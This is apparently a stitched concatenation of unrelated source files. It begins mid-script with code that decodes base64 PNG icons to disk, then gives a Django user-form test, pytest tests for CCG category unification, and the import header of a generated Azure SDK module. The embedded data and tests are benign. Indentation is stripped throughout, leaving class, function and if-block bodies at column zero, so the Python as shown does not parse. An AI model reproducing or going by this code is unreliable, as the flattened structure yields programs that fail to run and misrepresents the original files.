image_enconded = 'iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAYAAACqaXHeAAAACXBIWXMAAAsTAAALEwEAmpwYAAAF8WlUWHRYTUw6Y29tLmFkb2JlLnhtcAAAAAAAPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4gPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNS42LWMxNDggNzkuMTY0MDM2LCAyMDE5LzA4LzEzLTAxOjA2OjU3ICAgICAgICAiPiA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPiA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyIgeG1sbnM6cGhvdG9zaG9wPSJodHRwOi8vbnMuYWRvYmUuY29tL3Bob3Rvc2hvcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RFdnQ9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZUV2ZW50IyIgeG1wOkNyZWF0b3JUb29sPSJBZG9iZSBQaG90b3Nob3AgMjEuMCAoV2luZG93cykiIHhtcDpDcmVhdGVEYXRlPSIyMDIwLTA3LTA1VDE5OjU2OjQwLTA3OjAwIiB4bXA6TW9kaWZ5RGF0ZT0iMjAyMC0wNy0wN1QxNToyNToyOS0wNzowMCIgeG1wOk1ldGFkYXRhRGF0ZT0iMjAyMC0wNy0wN1QxNToyNToyOS0wNzowMCIgZGM6Zm9ybWF0PSJpbWFnZS9wbmciIHBob3Rvc2hvcDpDb2xvck1vZGU9IjMiIHBob3Rvc2hvcDpJQ0NQcm9maWxlPSJzUkdCIElFQzYxOTY2LTIuMSIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDo3ZGNlNzRhMi04YTE3LTI4NDItOGEwMy1lZWZmYzRjNGVkYWEiIHhtcE1NOkRvY3VtZW50SUQ9ImFkb2JlOmRvY2lkOnBob3Rvc2hvcDpkNjdiM2JkNy1iMjk3LWI3NDItOTNkOC0wYTYyZjZhYzUzMmYiIHhtcE1NOk9yaWdpbmFsRG9jdW1lbnRJRD0ieG1wLmRpZDplOTM5YzQ0Yi1lNjdkLWJjNGMtYWMyZS00YmY3ZjcwYzgzODAiPiA8eG1wTU06SGlzdG9yeT4gPHJkZjpTZXE+IDxyZGY6bGkgc3RFdnQ6YWN0aW9uPSJjcmVhdGVkIiBzdEV2dDppbnN0YW5jZUlEPSJ4bXAuaWlkOmU5MzljNDRiLWU2N2QtYmM0Yy1hYzJlLTRiZjdmNzBjODM4MCIgc3RFdnQ6d2hlbj0iMjAyMC0wNy0wNVQxOTo1Njo0MC0wNzowMCIgc3RFdnQ6c29mdHdhcmVBZ2VudD0iQWRvYmUgUGhvdG9zaG9wIDIxLjAgKFdpbmRvd3MpIi8+IDxyZGY6bGkgc3RFdnQ6YWN0aW9uPSJzYXZlZCIgc3RFdnQ6aW5zdGFuY2VJRD0ieG1wLmlpZDo3ZGNlNzRhMi04YTE3LTI4NDItOGEwMy1lZWZmYzRjNGVkYWEiIHN0RXZ0OndoZW49IjIwMjAtMDctMDdUMTU6MjU6MjktMDc6MDAiIHN0RXZ0OnNvZnR3YXJlQWdlbnQ9IkFkb2JlIFBob3Rvc2hvcCAyMS4wIChXaW5kb3dzKSIgc3RFdnQ6Y2hhbmdlZD0iLyIvPiA8L3JkZjpTZXE+IDwveG1wTU06SGlzdG9yeT4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2tldCBlbmQ9InIiPz7Q7fCFAAAIwklEQVR4nO3bf6xlVXUH8M/a5755w/BDfmaYCunAkyq22hFQbClia1sZMBicaIc2bWJqajQpwR9pY6TYKkk1jiBNbZpQq40mVCI60USjERqIP+LQoQRSx6hjfxEjTQpl+DXMu3cv/zjn3nnvdWbefe/O64Uw32TlnZx7ztrfvc7aa+299n6RmZ7PKNMmMG0cM8C0CUwbxwwwbQLTxjEDTJvAtPG8N0Dvpk8v/1AmOUBQGhI5TwZlFgOikuEkXCRskd6LH0f6taGe2iCJbHXp5mAR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'
# base64.decodestring was removed in Python 3.9; b64decode works in both Python 2 and 3
image_64_decode = base64.b64decode(image_enconded)
with open(gt_mtod_icon_image, 'wb') as image_result:
    image_result.write(image_64_decode)
# fSpy Importer
image_enconded = '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'
image_64_decode = base64.b64decode(image_enconded)
with open(gt_fspy_icon_image, 'wb') as image_result:
    image_result.write(image_64_decode)
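# A hedged sketch of how an embedded icon string like the ones above can be
# regenerated from a PNG on disk (the input path is an illustrative assumption):
#
#     with open('my_icon.png', 'rb') as png_file:
#         encoded = base64.b64encode(png_file.read()).decode('ascii')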
# Generate icons when the script is executed directly (rather than imported)
if __name__ == '__main__':
gt_generate_icons()
# ---- app/account/tests/test_forms.py (rogeriopaulos/gep, MIT) ----
from account.forms import UserEditForm, UserForm
from account.tests.factories import UserFactory
from django.test import TestCase
class UserFormTestCase(TestCase):
def setUp(self):
self.usr = UserFactory()
self.data = {
'username': self.usr.username,
'first_name': self.usr.first_name,
'last_name': self.usr.last_name,
'email': self.usr.email,
'password': self.usr.password,
}
def test_operacao_repetida(self):
email_indisponivel_error_message = 'Já existe um usuário com este e-mail.'
form = UserForm(data=self.data)
self.assertFalse(form.is_valid())
form.clean()
self.assertIn(('email', [email_indisponivel_error_message]), form.errors.items())
class UserEditFormTestCase(TestCase):
def setUp(self):
self.usr = UserFactory()
self.data = {
'username': self.usr.username,
'first_name': self.usr.first_name,
'last_name': self.usr.last_name,
'email': self.usr.email,
'password': self.usr.password,
}
def test_operacao_repetida(self):
email_indisponivel_error_message = 'Já existe um usuário com este e-mail.'
form = UserEditForm(data=self.data)
self.assertFalse(form.is_valid())
form.clean()
self.assertIn(('email', [email_indisponivel_error_message]), form.errors.items())
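# A hedged sketch of the uniqueness check these tests exercise; the real rule
# lives in account/forms.py and this clean_email body is hypothetical:
#
#     from django import forms
#     from django.contrib.auth.models import User
#
#     def clean_email(self):
#         email = self.cleaned_data['email']
#         if User.objects.filter(email=email).exists():
#             raise forms.ValidationError('Já existe um usuário com este e-mail.')
#         return email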
# ---- tests/test_unification.py (masashi-y/myccg, MIT) ----
from depccg.cat import Category
from depccg.unification import Unification
import pytest
def test_basic():
uni = Unification("(((a/b)/c)/d)/e", "f")
x = Category.parse("(((a/b)/c)/d)/e")
y = Category.parse("f")
assert uni(x, y)
assert uni["a"] == "a"
assert uni["b"] == "b"
assert uni["c"] == "c"
assert uni["d"] == "d"
assert uni["e"] == "e"
assert uni["f"] == "f"
with pytest.raises(RuntimeError, match="cannot use the same *"):
uni(x, y)
def test_deep():
uni = Unification("a/b", "c")
x = Category.parse("(((a/b)/c)/d)/e")
y = Category.parse("f")
assert uni(x, y)
assert uni["a"] == "((a/b)/c)/d"
assert uni["b"] == "e"
assert uni["c"] == "f"
def test_english():
uni = Unification("a/b", "b")
x = Category.parse("S[X]/NP[X]")
y = Category.parse("NP[mod]")
assert uni(x, y)
assert uni["a"] == Category.parse('S[mod]')
def test_japanese():
uni = Unification("(a\\b)/c", "c")
x = Category.parse(
"(S[mod=nm,form=base,fin=f]\\S[mod=nm,form=base,fin=f])/S[mod=nm,form=base,fin=f]")
y = Category.parse("S[mod=nm,form=base,fin=f]")
assert uni(x, y)
assert uni["a"] == Category.parse("S[mod=nm,form=base,fin=f]")
assert uni["b"] == Category.parse("S[mod=nm,form=base,fin=f]")
assert uni["c"] == Category.parse("S[mod=nm,form=base,fin=f]")
# three variables
uni = Unification("(a\\b)/c", "c")
x = Category.parse(
"(S[mod=X1,form=X2,fin=X3]\\S[mod=X1,form=X2,fin=X3])/S[mod=X1,form=X2,fin=X3]")
y = Category.parse("S[mod=nm,form=base,fin=f]")
assert uni(x, y)
assert uni["a"] == Category.parse("S[mod=nm,form=base,fin=f]")
assert uni["b"] == Category.parse("S[mod=nm,form=base,fin=f]")
assert uni["c"] == Category.parse("S[mod=nm,form=base,fin=f]")
# only two variables
uni = Unification("(a\\b)/c", "c")
x = Category.parse(
"(S[mod=X1,form=X2,fin=f]\\S[mod=X1,form=X2,fin=f])/S[mod=X1,form=X2,fin=f]")
y = Category.parse("S[mod=nm,form=base,fin=f]")
assert uni(x, y)
assert uni["a"] == Category.parse("S[mod=nm,form=base,fin=f]")
assert uni["b"] == Category.parse("S[mod=nm,form=base,fin=f]")
assert uni["c"] == Category.parse("S[mod=nm,form=base,fin=f]")
# ---- sdk/ml/azure-ai-ml/azure/ai/ml/_restclient/runhistory/aio/operations/_runs_operations.py (dubiety/azure-sdk-for-python, MIT) ----
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, List, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
